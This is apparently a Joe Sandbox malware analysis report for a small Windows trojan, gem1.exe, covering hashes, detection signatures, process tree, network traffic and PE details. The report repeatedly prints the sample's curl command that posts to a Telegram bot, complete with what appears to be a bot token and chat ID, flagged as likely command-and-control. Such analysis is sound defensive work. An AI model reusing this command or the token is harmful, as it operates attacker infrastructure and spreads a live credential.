Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gem1.exe

Overview

General Information

Sample name:gem1.exe
Analysis ID:1586747
MD5:ac4b32d014d380c67fbea66faf32ae99
SHA1:7260fe957cf3b4eba0f6d59bf980c4f590ac0e90
SHA256:65ad011502894d3437d68a6656f327ce18696610dec1226e9f24c84b5e90ac86
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates a process in suspended mode (likely to inject code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

  • System is w10x64
  • gem1.exe (PID: 2716 cmdline: "C:\Users\user\Desktop\gem1.exe" MD5: AC4B32D014D380C67FBEA66FAF32AE99)
    • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5348 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 6396 cmdline: curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" " MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" ", CommandLine: C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\gem1.exe", ParentImage: C:\Users\user\Desktop\gem1.exe, ParentProcessId: 2716, ParentProcessName: gem1.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" ", ProcessId: 5348, ProcessName: cmd.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T15:28:54.759276+010018100071Potentially Bad Traffic192.168.2.549706149.154.167.220443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.3% probability
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: gem1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\admin\source\repos\ConsoleApplication1\x64\Release\ConsoleApplication1.pdb source: gem1.exe

Networking

barindex
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49706 -> 149.154.167.220:443
Source: unknownDNS query: name: api.telegram.org
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage HTTP/1.1Host: api.telegram.orgUser-Agent: curl/7.83.1Accept: */*Content-Length: 42Content-Type: application/x-www-form-urlencoded
Source: gem1.exeString found in binary or memory: https://api.telegram.org/bot%s/sendMessage
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC10000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage-dchat_id=7437
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagea
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagek
Source: curl.exe, 00000003.00000003.2039573545.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagel
Source: curl.exe, 00000003.00000003.2039573545.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagep
Source: curl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessageu
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: classification engineClassification label: mal56.troj.winEXE@6/0@1/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03
Source: gem1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\gem1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\gem1.exe "C:\Users\user\Desktop\gem1.exe"
Source: C:\Users\user\Desktop\gem1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "
Source: C:\Users\user\Desktop\gem1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "Jump to behavior
Source: C:\Users\user\Desktop\gem1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\gem1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\gem1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: gem1.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: gem1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: gem1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: gem1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: gem1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: gem1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: gem1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: gem1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: gem1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\admin\source\repos\ConsoleApplication1\x64\Release\ConsoleApplication1.pdb source: gem1.exe
Source: gem1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: gem1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: gem1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: gem1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: gem1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\gem1.exeAPI coverage: 0.0 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: curl.exe, 00000003.00000003.2039573545.000001BB2BC24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\gem1.exeCode function: 0_2_00007FF662621880 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF662621880
Source: C:\Users\user\Desktop\gem1.exeCode function: 0_2_00007FF6626213A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6626213A4
Source: C:\Users\user\Desktop\gem1.exeCode function: 0_2_00007FF662621A24 SetUnhandledExceptionFilter,0_2_00007FF662621A24
Source: C:\Users\user\Desktop\gem1.exeCode function: 0_2_00007FF662621880 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF662621880
Source: C:\Users\user\Desktop\gem1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -X POST https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage -d chat_id=7437403846 -d text=" "Jump to behavior
Source: C:\Users\user\Desktop\gem1.exeCode function: 0_2_00007FF662621760 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF662621760
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
11
Process Injection
OS Credential Dumping1
System Time Discovery
Remote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
DLL Side-Loading
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager2
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586747 Sample: gem1.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 56 17 api.telegram.org 2->17 23 Suricata IDS alerts for network traffic 2->23 25 AI detected suspicious sample 2->25 8 gem1.exe 1 2->8         started        signatures3 27 Uses the Telegram API (likely for C&C communication) 17->27 process4 process5 10 cmd.exe 1 8->10         started        12 conhost.exe 8->12         started        process6 14 curl.exe 1 10->14         started        dnsIp7 19 api.telegram.org 149.154.167.220, 443, 49706 TELEGRAMRU United Kingdom 14->19 21 127.0.0.1 unknown unknown 14->21

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
api.telegram.org
149.154.167.220
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessageucurl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagekcurl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://api.telegram.org/bot%s/sendMessagegem1.exefalse
            high
            https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagelcurl.exe, 00000003.00000003.2039573545.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessage-dchat_id=7437curl.exe, 00000003.00000002.2039906364.000001BB2BC10000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessageacurl.exe, 00000003.00000002.2039906364.000001BB2BC17000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://api.telegram.org/bot8141905598:AAH9in-KYfxqOAJaQ7ST-b0X2_LuTd4KcPA/sendMessagepcurl.exe, 00000003.00000003.2039573545.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039519762.000001BB2BC2E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2039502515.000001BB2BC2C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2039965733.000001BB2BC2F000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    149.154.167.220
                    api.telegram.orgUnited Kingdom
                    62041TELEGRAMRUfalse
                    IP
                    127.0.0.1
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1586747
                    Start date and time:2025-01-09 15:28:04 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 2m 4s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:gem1.exe
                    Detection:MAL
                    Classification:mal56.troj.winEXE@6/0@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 1
                    • Number of non-executed functions: 3
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): dllhost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • VT rate limit hit for: gem1.exe
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    149.154.167.220Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                          PO.exeGet hashmaliciousMassLogger RATBrowse
                            BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      spreadmalware.exeGet hashmaliciousXWormBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        api.telegram.orgCopy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                        • 149.154.167.220
                                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                        • 149.154.167.220
                                        PO.exeGet hashmaliciousMassLogger RATBrowse
                                        • 149.154.167.220
                                        BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • 149.154.167.220
                                        oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 149.154.167.220
                                        spreadmalware.exeGet hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TELEGRAMRUCopy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        DyM4yXX.exeGet hashmaliciousVidarBrowse
                                        • 149.154.167.99
                                        JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                        • 149.154.167.220
                                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                        • 149.154.167.220
                                        5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                        • 149.154.167.99
                                        PO.exeGet hashmaliciousMassLogger RATBrowse
                                        • 149.154.167.220
                                        BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • 149.154.167.220
                                        oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        74954a0c86284d0d6e1c4efefe92b521tiko-ifyzit-srdh.vbsGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                        • 149.154.167.220
                                        Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        676556be12ac3.vbsGet hashmaliciousMint StealerBrowse
                                        • 149.154.167.220
                                        PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.htaGet hashmaliciousMint StealerBrowse
                                        • 149.154.167.220
                                        9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        No context
                                        No created / dropped files found
                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                        Entropy (8bit):4.828091453123838
                                        TrID:
                                        • Win64 Executable Console (202006/5) 92.65%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:gem1.exe
                                        File size:11'776 bytes
                                        MD5:ac4b32d014d380c67fbea66faf32ae99
                                        SHA1:7260fe957cf3b4eba0f6d59bf980c4f590ac0e90
                                        SHA256:65ad011502894d3437d68a6656f327ce18696610dec1226e9f24c84b5e90ac86
                                        SHA512:58c49bbc0e7e7c20d264439e63217d46920c656c4933899fbcd8e1b1d52b88be40a874ebc404480f686fefed43410396bf710731400951e86afc3ee92e966f59
                                        SSDEEP:192:KMoY1gsdTeGn3MT3pT/Fap+k3Q5tfkcm/9K:KNAgcdnMpTU3d/o
                                        TLSH:8E323B0FE7D58CFED55A42B8CC6B115DE076B628A762A3CB1378141A2FC53E1662228D
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jpE..#E..#E..#L..#O..#Uf."F..#Uf."F..#Uf."O..#Uf."V..#..."G..#E..#w..#.g."D..#.g.#D..#.g."D..#RichE..#................PE..d..
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x140001390
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x140000000
                                        Subsystem:windows cui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x67334C57 [Tue Nov 12 12:38:47 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:a255ca210722d7af895e8aaf3327dc81
                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        call 00007FD838B6B26Ch
                                        dec eax
                                        add esp, 28h
                                        jmp 00007FD838B6AD17h
                                        int3
                                        int3
                                        inc eax
                                        push ebx
                                        dec eax
                                        sub esp, 20h
                                        dec eax
                                        mov ebx, ecx
                                        xor ecx, ecx
                                        call dword ptr [00000C6Bh]
                                        dec eax
                                        mov ecx, ebx
                                        call dword ptr [00000C5Ah]
                                        call dword ptr [00000C64h]
                                        dec eax
                                        mov ecx, eax
                                        mov edx, C0000409h
                                        dec eax
                                        add esp, 20h
                                        pop ebx
                                        dec eax
                                        jmp dword ptr [00000C98h]
                                        dec eax
                                        mov dword ptr [esp+08h], ecx
                                        dec eax
                                        sub esp, 38h
                                        mov ecx, 00000017h
                                        call dword ptr [00000C7Ch]
                                        test eax, eax
                                        je 00007FD838B6AEA9h
                                        mov ecx, 00000002h
                                        int 29h
                                        dec eax
                                        lea ecx, dword ptr [00002D22h]
                                        call 00007FD838B6AF4Eh
                                        dec eax
                                        mov eax, dword ptr [esp+38h]
                                        dec eax
                                        mov dword ptr [00002E09h], eax
                                        dec eax
                                        lea eax, dword ptr [esp+38h]
                                        dec eax
                                        add eax, 08h
                                        dec eax
                                        mov dword ptr [00002D99h], eax
                                        dec eax
                                        mov eax, dword ptr [00002DF2h]
                                        dec eax
                                        mov dword ptr [00002C63h], eax
                                        dec eax
                                        mov eax, dword ptr [esp+40h]
                                        dec eax
                                        mov dword ptr [00002D67h], eax
                                        mov dword ptr [00002C3Dh], C0000409h
                                        mov dword ptr [00002C37h], 00000001h
                                        mov dword ptr [00002C41h], 00000001h
                                        Programming Language:
                                        • [IMP] VS2008 SP1 build 30729
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x298c0xa0.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x1e0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x50000x18c.pdata
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x70000x30.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x24500x70.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x23100x140.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x1a0.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
